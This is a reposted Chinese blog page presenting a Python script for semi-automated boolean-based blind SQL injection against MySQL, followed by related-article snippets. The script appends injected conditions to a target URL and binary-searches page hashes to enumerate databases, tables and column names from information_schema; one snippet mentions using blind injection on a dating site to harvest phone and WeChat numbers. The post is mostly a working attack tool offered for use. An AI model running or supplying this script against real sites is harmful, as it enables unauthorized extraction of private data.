python脚本实现半自动化布尔盲注

最新推荐文章于 2024-09-29 11:11:32 发布
最新推荐文章于 2024-09-29 11:11:32 发布
阅读量895 收藏 3
点赞数
分类专栏: python 文章标签: 转载

原文链接:http://zzqsmile.top/2018/06/04/python3/2018-06-04-布尔盲注/

from optparse import OptionParser
import sys
import requests
import hashlib

parser=OptionParser()

parser.add_option("-D", "--database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--url", action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

def main():
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database ==None and options.table == None and options.column == None:
        get_all_databases(options.url)
    elif  options.url != None and options.database !=None and options.table == None and options.column == None:
        get_db_all_tables(options.url,options.database)
    elif  options.url != None and options.database !=None and options.table != None and options.column == None:
        get_db_tb_all_columns(options.url,options.database,options.table)
    elif  options.url != None and options.database !=None and options.table != None and options.column != None:
        getAllContent(options.url,options.database,options.table,options.column)



def http_get(url):
    result = requests.get(url)
    return result.content

#获取数据库
def get_all_databases(url):
	db_nums_payload = "select count(schema_name) from information_schema.schemata"
	db_numbers = half(url,db_nums_payload)
	print("数据库的总个数为:%d" % db_numbers)
	for x in range(db_numbers):
		db_len_payload = "select length(schema_name) from information_schema.schemata limit %d,1" % x
		db_name_numbers = half(url,db_len_payload)

		db_name = ""
		for y in range(1,db_name_numbers+1):
		 	
		 	db_name_payload = "ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (x,y)
		 	db_name += chr(half(url,db_name_payload))

		print("第%d个数据库为:%s" % (x+1,db_name))



#获取指定数据库中的表
def get_db_all_tables(url,database):
    tb_nums_payload = "select count(table_name) from information_schema.tables where table_schema = '%s'" % database
    tb_numbers = half(url,tb_nums_payload)
    print("%s数据库中的表个数为:%d" % (database,tb_numbers))

    for x in range(tb_numbers):
        tb_len_payload  = "select length(table_name) from information_schema.tables where table_schema = '%s' limit %d,1" % (database,x)
        
        tb_name_numbers = half(url,tb_len_payload)
        # print(tb_name_numbers)
        tb_name = ""
        for y in range(1,tb_name_numbers+1):
            
            tb_name_payload = "ascii(substr((select table_name from information_schema.tables where table_schema = '%s' limit %d,1),%d,1))" % (database,x,y)
            # print(tb_name_payload)                
            tb_name += chr(half(url,tb_name_payload))
            # print(tb_name)
        print(database,"数据库中第%d个表为:%s" % (x+1,tb_name))



#获取指定数据库中指定表的字段 
def get_db_tb_all_columns(url,database,table):
    co_nums_payload = "select count(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s'" % (database,table)
    co_numbers = half(url,co_nums_payload)
    print("%s 数据库中的 %s 表中的字段个数为:%d" % (database,table,co_numbers))
    for x in range(co_numbers):
        co_len_payload  = "select length(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1" % (database,table,x)
        co_name_numbers = half(url,co_len_payload)

        co_name = ""
        for y in range(1,co_name_numbers+1):
            
            co_name_payload = "ascii(substr((select column_name from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1),%d,1))" % (database,table,x,y)
            co_name += chr(half(url,co_name_payload))

        print(database,"数据库中",table,"表中第%d个字段名为:%s" % (x+1,co_name))



#获取指定数据库中指定表中指定字段内容
def getAllContent():
    pass


#python里面没有MD5加密函数,需要自己写
def md5(str):
    hl = hashlib.md5()
    hl.update(str)
    return hl.hexdigest()


#二分法函数
def half(url,payload):
    low = 0
    high = 126
    standard_html = md5(http_get(url))
    # print(standard_html)
    while low <= high:
        mid=(low + high)/2
        mid_num_payload = url + " and (%s) > %d-- " % (payload,mid)
        # print(mid_num_payload)
        mid_html = md5(http_get(mid_num_payload))
        #print(mid_html)
        if mid_html == standard_html:
            low = mid + 1
        else:
            high = mid - 1 
    mid_num = int((low+high+1)/2)
    return mid_num


if __name__ == '__main__':
    main();

在这里插入图片描述

「已注销」
关注
专栏目录
Python-Sql盲注检测
weixin_57041250的博客
11-02 243
sql盲注分为布尔盲注,时间型盲注
sql 布尔盲注 python脚本实现
sophia9301的博客
10-12 7711
渣渣一枚,把学习sql注入过程中遇到的一些问题记录下来,以供日后参考。 按照网上教程注入时发现过滤了union = < > ,顿时就一脸懵逼,因为不会构造sql语句,更不会绕过,最后在师父的指导下,首先通过手工注入,注入出了数据库名及长度。 1.数据库名长度: http://XXX.XXX.XX/sql.php? id=345’ and length(database()) like 1 an
python脚本实现布尔盲注
求大佬师傅带
04-28 1006
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
sql注入工具升级:自动化时间盲注布尔盲注
anddddoooo的博客
09-29 528
给我之前写的sql注入脚本进行了一些升级,此文章就是对升级内容的分析,升级内容如下:使用占位符foo来填充payload里需要经常修改的部分自动判断循环支持爆破和二分查找法来枚举一个字符显示枚举一个字符所需要的时间和数据包的数量二分查找的优点和缺点。
python布尔盲注脚本
kiihuang的博客
03-28 538
使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1281
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 4264
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
SQL注入之基于布尔盲注详解
09-10
在实际操作中,由于手动进行布尔盲注非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
sqlserver数据库布尔盲注_SQL注入之基于布尔盲注详解
weixin_30623181的博客
12-24 1308
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
Python脚本实现Web漏洞扫描工具
09-21
### Python脚本实现Web漏洞扫描工具 #### 一、项目背景与目的 本文介绍的是一个由作者在毕业设计阶段开发的Web漏洞扫描工具。该工具主要用于检测常见的Web应用安全漏洞,如SQL注入漏洞、SQL盲注漏洞以及跨站脚本...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
python-盲注
qq_41232519的博客
04-22 417
import requests import time #目标url url = 'http://192.168.8.152/sql/Less-1/?id=1' #查库语句 database = 'select schema_name from information_schema.schemata' #查当前表语句 table = 'select table_name from infor...
python脚本自动化盲注_Python SQL盲注脚本
weixin_42181686的博客
02-11 390
Python SQL盲注脚本2018-11-30268基于布尔盲注#!/usr/bin/env pythonimport requests#dbs#SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.SCHEMATA#tables#SELECT GROUP_CONCAT(table_NAME) FROM information_sche...
爱上python盲注探测脚本
dfdhxb995397的博客
09-13 176
  本文转自:i春秋论坛 前言:   最近在学python,做了个盲注的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自写脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔盲注的靶机   另外感谢大表姐的指导。   稍作解释:注入语句里用%s占位,等待在for循里面依次判断长度 [App...
Python-Boolean盲注脚本(附带注释,总脚本在结尾)
sGanYu
02-27 1279
靶场:CTFHub 设置重新连接,默认的情况下keep-alive为True # -*- coding: UTF-8 -*- import requests import optparse # 实现脚本传递命令参数 import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} flag = "query_success" # 判断盲注Ture回显的特定内容 r1 = int(input('设置重连次数
python mysql盲注脚本
夜班机器人的博客
07-26 2548
某相亲网漏洞,可盲注获得手机号和微信号。 功能1:爬取所有女性ID、年龄、月薪、照片URL 功能2:通过盲注方式获取对应ID的手机号和微信号 功能3:所有数据自动导入MYSQL 缺点:单线程
构造exp-Python盲注脚本
告白的博客
08-12 492
0x00 搭建环境介绍 平常的盲注如果手工会很麻烦,多数情况都会借助sqlmap等相关软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个盲注脚本,低线程,高效率。 利用到metinfo老版本平台,平台中集合多种漏洞,本次实验实验python构造盲注exp,实现注入 手工注入测试: 0x01 利用python构造exp-盲注脚本 import requests def get_html(url): "我的功能判断页面内容是否
python substr_python盲注
weixin_39695306的博客
11-27 125
给大家来一份python盲注的代码我自己改了一些内容,到时候我把其封装成为.exe文件,或者.apk文件,再把资源发出来,接下来是代码 import requests# 爆数据库长度def db_length(url,s): db_length = 0 for i in range(1, 20): db_payload = "2%s and (length(da...
Python实现SQL布尔盲注
最新发布
10-18
布尔盲注通常涉及构造查询,其中包含条件表达式,比如`WHERE column_name = 'value' OR 'malicious_sql'`,恶意部分`'malicious_sql'`试图影响查询结果。 举个例子,如果你有一个搜索功能,允许用户搜索用户名,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值